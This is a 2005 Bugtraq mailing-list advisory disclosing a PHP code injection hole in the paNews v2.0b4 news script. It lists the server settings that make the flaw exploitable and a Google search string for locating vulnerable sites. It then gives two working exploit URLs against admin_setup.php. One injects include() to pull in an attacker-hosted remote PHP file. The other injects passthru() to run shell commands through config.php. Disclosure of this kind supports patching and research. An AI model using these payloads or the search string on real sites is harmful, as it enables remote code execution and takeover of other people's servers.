paNews v2.0b4 - PHP Injection

• Previous message: pokley: "[SCAN Associates Security Advisory] vbulletin 3.0.6 and below php code injection"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Mon, 21 Feb 2005 07:13:30 +0200
To: bugtraq@securityfocus.com

oooo oooo oooooooo8 ooooooooooo
 8888o 88 888 88 888 88
 88 888o88 888oooooo 888
 88 8888 888 888
o88o 88 o88oooo888 o888o
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: тёмыч
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Бага работает только если:
1. register_globals=On
2. на папку includes стоят права на запись

p.s. отрубите яваскрипты - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php

Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id

• text/plain attachment: paNews_v2.0b4.txt

• Previous message: pokley: "[SCAN Associates Security Advisory] vbulletin 3.0.6 and below php code injection"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]